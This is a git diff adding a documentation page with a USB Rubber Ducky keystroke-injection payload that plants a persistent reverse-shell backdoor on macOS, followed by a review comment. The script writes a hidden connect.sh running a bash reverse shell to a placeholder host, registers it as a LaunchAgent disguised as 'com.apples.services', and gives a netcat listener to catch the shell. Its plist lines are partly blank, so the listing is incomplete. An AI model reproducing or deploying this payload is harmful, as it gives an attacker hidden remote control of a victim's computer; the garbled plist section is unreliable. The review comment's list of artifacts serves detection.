diff --git a/Payload----OSX-User-Backdoor.rdoc b/Payload----OSX-User-Backdoor.rdoc new file mode 100644 index 0000000..8cbc91e --- /dev/null +++ b/Payload----OSX-User-Backdoor.rdoc 
@@ -0,0 +1,79 @@ +* Author - Patrick Mosca +* Insert ducky. This script will created a persistent backdoor as the current user. It works by injecting code into a terminal from Spotlight. This payload was encoded with v2.4 on firmware duck_v2.1.hex. Change to your IP address or domain name and port number. +* A good tutorial on the payload here: http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ + + + REM Patrick Mosca + REM A simple script for creating a persistent backdoor on OSX. + REM Change mysite.com to your domain name or IP address + REM Change 1337 to your port number + REM Catch the shell with 'nc -l -p 1337' + REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ + DELAY 1000 + GUI SPACE + STRING terminal + DELAY 500 + ENTER + DELAY 500 + STRING mkdir ~/Library/.hidden + ENTER + DELAY 200 + STRING echo '#!/bin/bash + ENTER + STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 + ENTER + STRING wait' > ~/Library/.hidden/connect.sh + ENTER + DELAY 500 + STRING chmod +x ~/Library/.hidden/connect.sh + ENTER + DELAY 200 + STRING mkdir ~/Library/LaunchAgents + ENTER + DELAY 200 + STRING echo ' + ENTER + STRING + ENTER + STRING Label + ENTER + STRING com.apples.services + ENTER + STRING ProgramArguments + ENTER + STRING + ENTER + STRING /bin/sh + ENTER + STRING '$HOME'/Library/.hidden/connect.sh + ENTER + STRING + ENTER + STRING RunAtLoad + ENTER + STRING + ENTER + STRING StartInterval + ENTER + STRING 60 + ENTER + STRING AbandonProcessGroup + ENTER + STRING + ENTER + STRING + ENTER + STRING ' > ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + GUI q + +Catch the shell with netcat: + + nc -l -p 1337 \ No newline at end of file
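Review bot: in the plist section of the hunk (from `STRING echo '` through `STRING ' > ~/Library/LaunchAgents/com.apples.services.plist`) several `STRING` lines carry no argument at all, so the listing as committed no longer shows what the script actually types into the file; either the markup was dropped when the page was saved or the Ducky script is incomplete, and the page should say which. The description above the script would also be more useful if it named the artifacts the payload leaves behind, which are all visible in the hunk: the hidden directory `~/Library/.hidden` with `connect.sh`, and a LaunchAgent labelled `com.apples.services` that sets `RunAtLoad` and a `StartInterval` of 60, loaded with `launchctl load`; listing them lets a reader recognise and unload the agent, not just install it. Minor wording: "This script will created a persistent backdoor" should read "will create", and "Change to your IP address or domain name and port number" is missing what to change (the `mysite.com` and `1337` placeholders named in the REM lines).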